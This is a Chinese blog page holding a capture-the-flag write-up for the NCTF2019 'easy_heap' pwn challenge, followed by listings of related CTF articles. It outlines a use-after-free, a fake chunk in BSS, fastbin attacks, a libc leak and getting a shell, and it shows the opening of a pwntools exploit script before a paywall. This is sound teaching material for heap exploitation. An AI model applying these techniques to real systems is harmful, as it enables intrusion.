【Pwn】NCTF2019 easy_heap

最新推荐文章于 2024-01-25 22:37:14 发布
最新推荐文章于 2024-01-25 22:37:14 发布
阅读量575 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/github_36788573/article/details/103316220
版权
该博客详细分析了NCTF2019 easy_heap挑战中的堆溢出漏洞,指出在free后指针未清零导致的Use-After-Free(UAF)问题。由于程序对堆分配大小有限制,通过在BSS段伪造堆块并利用fastbin attack,可以突破限制,进一步泄露libc地址。然后,通过第二次fastbin attack实现获取shell的目标。
摘要由CSDN通过智能技术生成

查看程序保护。
在这里插入图片描述分析程序,漏洞在free之后指针没置0,导致uaf;堆的分配大小做了限制0x50该变量在bss段上,刚好bss段上存放了用户名信息,所以先考虑在bss上伪造堆块,进行一次fastbinattack,分配到bss段,修改限制大小,去掉限制之后就是常规操作了,unsortbin泄露libc,再进行一次fastbinattack,getshell。

from pwn import *

io=remote('xx.xx.xx.xx',xxxxx)
libc=ELF('./libc-2.23.so')

def add(size,data):
    io.recvuntil('4. exit\n')
    io.sendline('1')
    io.recvuntil('heap_size?')
    io.sendline(str(size))
    io.recvuntil('heap_content?')
    io.send(data)

def free
最低0.47元/天 解锁文章
不干正事的拖延症患者
关注
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
萌新详解[ZJCTF 2019]EasyHeap,带你走进pwn世界
qq_36495104的博客
05-21 1965
安全保护 IDA查看 main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+0h] [rbp-10h] unsigned __int64 v5; // [rsp+8h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); se
[ZJCTF 2019]EasyHeap
m0sway的博客
12-15 1426
[ZJCTF 2019]EasyHeap 使用checksec查看: 一道堆题,关闭了PIE,可以考虑覆盖got表来获取system getshell 拉进IDA中查看: 标准的菜单,main()函数就不贴截图了,menu()函数也没有营养,图也不贴了, 先来看看create_heap(): heaparray[i]:存放 chunk 的地址。 read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。 heaparray是存放在bss段上的 edit
pwn入门堆题[ZJCTF 2019]EasyHeap
最新发布
m0_73575406的博客
01-25 600
buuctf上一道简单的堆题wp,希望对新手有帮助(虽然我也只是刚学不久的新手啦QAQ),非常简单的利用方式,比uaf还简单(看wp前建议去wiki了解一下unsortedbin的相关知识)。
[NCTF2019]SQLi
weixin_68906365的博客
02-19 284
regexp注入
[BUUCTF]-PWN:[ZJCTF 2019]EasyHeap解析
2301_79326813的博客
01-12 609
这是buu上的一道堆题,话不多说直接看保护和ida这里有一个要注意的点,那就是它是partial RELRO,Full RELRO开启说明got表不可写,而这里没有,这是我们解题的一个前提。然后看ida。这里不过多解释,主要还是创建堆块,释放堆块,edit堆块,但是没有打印堆块内容的函数。还有一个要注意的点,那就是他有system函数,并且参数似乎可以利用。虽然在我解题的过程中这个函数压根得不到flag,但我还是想从这一角度讲解一下解题思路,所以我分两个角度来讲。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2748
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
sctf_2019_easy_heap
qq_62887641的博客
09-10 148
64位保护全开,本题是一道申请size大小不超过0x1000,可以超过tcache的size没有uafedit这里没什么主要是在最后那里存在off by null ,可以溢出一个\x00本题没有show,但是有个很重要的地方这里,开辟了一个7权限的栈,并且给出了栈地址,
[NCTF2019]True XML cookbook
qq_52907838的博客
08-04 2591
打开环境,看到熟悉的页面,和前面的[NCTF2019]Fake XML cookbook页面一样,应该也是XXE漏洞,这里再介绍一下XXE漏洞: XXE(XML External Entity Injection)全称为XML外部实体注入。 XML是什么? XML指可扩展标记语言(EXtensible Markup Language),其设计宗旨是传输数据,而不是显示数据,用来结构化、存储以及传输信息,它没有预定义的标签。XML 和 HTML 之间的差异是什么? 设计目的不同:XML 被设计用来传输
BUUCTF pwn——[ZJCTF 2019]EasyHeap
CNS-Enterprise BCC-1701-J
05-30 288
BUUCTF 做题练习
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 478
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
Y_peak的博客
11-16 949
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap 思路 我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果, 但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用uaf就可以达到其目的。 exploit from pwn import * context(os='linux',arch='amd64',log_level='debug') p = remot
BUUCTF [NCTF2019]childRSA(费马小定理)
晓寒的博客
07-12 4052
[NCTF2019]childRSA(费马小定理) 题目 from random import choice from Crypto.Util.number import isPrime, sieve_base as primes from flag import flag def getPrime(bits): while True: n = 2 while n.bit_length() < bits: n *= choice(primes) if isPrime(n + 1): return n
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值